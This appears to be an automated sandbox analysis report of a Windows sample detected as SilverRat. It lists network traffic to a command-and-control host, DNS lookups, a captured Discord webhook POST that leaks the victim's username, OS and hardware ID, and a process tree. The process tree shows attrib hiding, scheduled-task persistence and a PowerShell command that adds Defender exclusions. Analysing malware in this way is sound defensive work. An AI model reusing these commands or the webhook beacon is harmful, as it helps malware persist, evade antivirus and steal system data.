                                                        Nov 9, 2024 22:53:11.319015026 CET4970729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:11.323846102 CET2985349707141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:19.797689915 CET2985349707141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:19.797759056 CET4970729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:19.817289114 CET4970729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:19.820099115 CET4970929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:19.822069883 CET2985349707141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:19.824978113 CET2985349709141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:19.825052023 CET4970929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:19.825299025 CET4970929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:19.830282927 CET2985349709141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:28.311709881 CET2985349709141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:28.311763048 CET4970929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:28.317312002 CET4970929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:28.318223000 CET4976129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:28.322072029 CET2985349709141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:28.322952986 CET2985349761141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:28.323009968 CET4976129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:28.323283911 CET4976129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:28.328025103 CET2985349761141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:36.811523914 CET2985349761141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:36.811645031 CET4976129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:36.817347050 CET4976129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:36.818115950 CET4980829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:36.822068930 CET2985349761141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:36.822875977 CET2985349808141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:36.823004961 CET4980829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:36.823196888 CET4980829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:36.827969074 CET2985349808141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:45.317496061 CET2985349808141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:45.319535971 CET4980829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:45.333024025 CET4980829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:45.333954096 CET4985829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:45.337800026 CET2985349808141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:45.338819981 CET2985349858141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:45.338912010 CET4985829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:45.339174032 CET4985829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:45.343924046 CET2985349858141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:53.828082085 CET2985349858141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:53.828172922 CET4985829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:53.833153963 CET4985829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:53.834016085 CET4990729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:53.837995052 CET2985349858141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:53.838794947 CET2985349907141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:53.838864088 CET4990729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:53.839072943 CET4990729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:53.844008923 CET2985349907141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:02.327749014 CET2985349907141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:02.327976942 CET4990729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:02.333097935 CET4990729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:02.334119081 CET4995429853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:02.339046955 CET2985349907141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:02.340261936 CET2985349954141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:02.340420961 CET4995429853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:02.340704918 CET4995429853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:02.346492052 CET2985349954141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:11.728723049 CET2985349954141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:11.728739977 CET2985349954141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:11.728806973 CET4995429853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:11.728918076 CET2985349954141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:11.728961945 CET4995429853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:11.729414940 CET2985349954141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:11.729459047 CET4995429853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:11.739362955 CET4995429853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:11.744162083 CET2985349954141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:11.868951082 CET4998729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:11.873913050 CET2985349987141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:11.874003887 CET4998729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:11.874306917 CET4998729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:11.879230022 CET2985349987141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:20.354957104 CET2985349987141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:20.355051041 CET4998729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:20.364422083 CET4998729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:20.365267038 CET4998829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:20.369168997 CET2985349987141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:20.370034933 CET2985349988141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:20.370235920 CET4998829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:20.370520115 CET4998829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:20.375430107 CET2985349988141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:28.853934050 CET2985349988141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:28.854131937 CET4998829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:28.864495993 CET4998829853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:28.865514994 CET4998929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:28.869414091 CET2985349988141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:28.870423079 CET2985349989141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:28.870518923 CET4998929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:28.870812893 CET4998929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:28.875596046 CET2985349989141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:37.359064102 CET2985349989141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:37.359164000 CET4998929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:37.364726067 CET4998929853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:37.365525961 CET4999029853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:37.369565010 CET2985349989141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:37.370357037 CET2985349990141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:37.370434999 CET4999029853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:37.370732069 CET4999029853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:37.375763893 CET2985349990141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:45.854302883 CET2985349990141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:45.854388952 CET4999029853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:45.864538908 CET4999029853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:45.865401030 CET4999129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:45.869288921 CET2985349990141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:45.870198011 CET2985349991141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:45.870269060 CET4999129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:45.870481014 CET4999129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:45.875369072 CET2985349991141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:54.353502035 CET2985349991141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:54.353583097 CET4999129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:54.364593029 CET4999129853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:54.365494013 CET4999229853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:54.369419098 CET2985349991141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:54.370341063 CET2985349992141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:54:54.370410919 CET4999229853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:54.370630980 CET4999229853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:54:54.375423908 CET2985349992141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:55:02.852929115 CET2985349992141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:55:02.853051901 CET4999229853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:55:02.865051985 CET4999229853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:55:02.866322994 CET4999329853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:55:02.870007038 CET2985349992141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:55:02.871200085 CET2985349993141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:55:02.871295929 CET4999329853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:55:02.871540070 CET4999329853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:55:02.876430035 CET2985349993141.98.102.187192.168.2.5
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 9, 2024 22:53:09.861186028 CET4919053192.168.2.51.1.1.1
                                                        Nov 9, 2024 22:53:09.868027925 CET53491901.1.1.1192.168.2.5
                                                        Nov 9, 2024 22:53:10.872009039 CET5849253192.168.2.51.1.1.1
                                                        Nov 9, 2024 22:53:11.002684116 CET53584921.1.1.1192.168.2.5
                                                        Nov 9, 2024 22:54:11.740046978 CET5604153192.168.2.51.1.1.1
                                                        Nov 9, 2024 22:54:11.868269920 CET53560411.1.1.1192.168.2.5
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 9, 2024 22:53:09.861186028 CET192.168.2.51.1.1.10xcedeStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                        Nov 9, 2024 22:53:10.872009039 CET192.168.2.51.1.1.10x40ffStandard query (0)kanibal.mooo.comA (IP address)IN (0x0001)false
                                                        Nov 9, 2024 22:54:11.740046978 CET192.168.2.51.1.1.10xfdbfStandard query (0)kanibal.mooo.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 9, 2024 22:53:09.868027925 CET1.1.1.1192.168.2.50xcedeNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                        Nov 9, 2024 22:53:09.868027925 CET1.1.1.1192.168.2.50xcedeNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                        Nov 9, 2024 22:53:09.868027925 CET1.1.1.1192.168.2.50xcedeNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                        Nov 9, 2024 22:53:09.868027925 CET1.1.1.1192.168.2.50xcedeNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                        Nov 9, 2024 22:53:09.868027925 CET1.1.1.1192.168.2.50xcedeNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                        Nov 9, 2024 22:53:11.002684116 CET1.1.1.1192.168.2.50x40ffNo error (0)kanibal.mooo.com141.98.102.187A (IP address)IN (0x0001)false
                                                        Nov 9, 2024 22:54:11.868269920 CET1.1.1.1192.168.2.50xfdbfNo error (0)kanibal.mooo.com141.98.102.187A (IP address)IN (0x0001)false
                                                        • discord.com
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549706162.159.137.2324432884C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-09 21:53:10 UTC255OUTPOST /api/webhooks/1096011178049802290/d9w9LhtbB8Cy4apceC6cLWfZWhlAAMAf3qABUNFcfpGyxXEk9Qtozf7gqlpK15fLwasp HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: discord.com
                                                        Content-Length: 414
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-11-09 21:53:10 UTC25INHTTP/1.1 100 Continue
                                                        2024-11-09 21:53:10 UTC414OUTData Raw: 75 73 65 72 6e 61 6d 65 3d 48 65 79 2b 41 44 4d 49 4e 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 67 2e 74 6f 70 34 74 6f 70 2e 69 6f 25 32 66 70 5f 32 35 32 32 63 37 77 38 75 31 2e 70 6e 67 26 63 6f 6e 74 65 6e 74 3d 59 6f 75 2b 68 61 76 65 2b 61 2b 63 6c 69 65 6e 74 2b 6f 6e 6c 69 6e 65 2b 6e 6f 77 2b 25 37 62 2b 4e 65 77 2b 25 37 64 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 55 73 65 72 6e 61 6d 65 2b 25 33 61 2b 61 6c 66 6f 6e 73 25 34 30 38 39 37 35 30 36 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 53 79 73 74 65 6d 2b 25 33 61 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 48 57 49 44 2b 25 33 61 2b 38 41 42 46 37 42 37 33 36 46 32 46 46 43
                                                        Data Ascii: username=Hey+ADMIN&avatar_url=https%3a%2f%2fg.top4top.io%2fp_2522c7w8u1.png&content=You+have+a+client+online+now+%7b+New+%7d%0a++%e2%9c%85+Username+%3a+user%40897506%0a++%e2%9c%85+System+%3a+Microsoft+Windows+10+Pro%0a++%e2%9c%85+HWID+%3a+8ABF7B736F2FFC
                                                        2024-11-09 21:53:10 UTC1302INHTTP/1.1 404 Not Found
                                                        Date: Sat, 09 Nov 2024 21:53:10 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 45
                                                        Connection: close
                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                        x-ratelimit-limit: 5
                                                        x-ratelimit-remaining: 4
                                                        x-ratelimit-reset: 1731189192
                                                        x-ratelimit-reset-after: 1
                                                        via: 1.1 google
                                                        alt-svc: h3=":443"; ma=86400
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUwVeMTn46AHZNgPU7jzSwB1ChURg%2FZ0LFBa8yr2cMhRL%2BgeeUIZxuG0i0PQUqzNy8ZKyhAeWIV43fbBNmoZdLl6LT1mOa5sEtwDPTTI%2BcwJrXZKL5K8l6cn%2FtdY"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        X-Content-Type-Options: nosniff
                                                        Set-Cookie: __cfruid=abcf9f927ef405fe1dead6df440f9055f166ebbb-1731189190; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                        Set-Cookie: _cfuvid=78SoGGeM4_zTYGvCUSTwQVwmHc8KwTnr0hkI6fWjeOI-1731189190777-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                        Server: cloudflare
                                                        CF-RAY: 8e0108b949c62cc7-DFW
                                                        {"message": "Unknown Webhook", "code": 10015}


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:16:53:02
                                                        Start date:09/11/2024
                                                        Path:C:\Users\user\Desktop\Xyq6rvzLJs.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\Xyq6rvzLJs.exe"
                                                        Imagebase:0x620000
                                                        File size:46'592 bytes
                                                        MD5 hash:5EC3267ACFD4EF36CBFB796016142892
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000002.2077667438.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000000.2051314011.0000000000622000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:16:53:04
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\attrib.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA"
                                                        Imagebase:0x7ff6d16b0000
                                                        File size:23'040 bytes
                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:16:53:04
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:16:53:04
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\attrib.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe"
                                                        Imagebase:0x7ff6d16b0000
                                                        File size:23'040 bytes
                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:16:53:04
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:16:53:04
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF224.tmp.bat""
                                                        Imagebase:0x7ff6a4100000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:16:53:05
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:16:53:05
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\timeout.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:timeout 3
                                                        Imagebase:0x7ff655450000
                                                        File size:32'768 bytes
                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe"
                                                        Imagebase:0xeb0000
                                                        File size:46'592 bytes
                                                        MD5 hash:5EC3267ACFD4EF36CBFB796016142892
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 63%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:13
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"schtasks.exe" /query /TN $77EAAntiCheat.Installler.exe
                                                        Imagebase:0x7ff717eb0000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                                                        Imagebase:0x7ff717eb0000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"schtasks.exe" /query /TN $77EAAntiCheat.Installler.exe
                                                        Imagebase:0x7ff717eb0000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                                        Imagebase:0x7ff7be880000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "EAAntiCheat.Installler_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                                                        Imagebase:0x7ff717eb0000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:16:53:08
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:16:53:10
                                                        Start date:09/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe "\$77EAAntiCheat.Installler.exe" /AsAdmin
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:46'592 bytes
                                                        MD5 hash:5EC3267ACFD4EF36CBFB796016142892
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:16:53:11
                                                        Start date:09/11/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff6ef0c0000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:23.7%
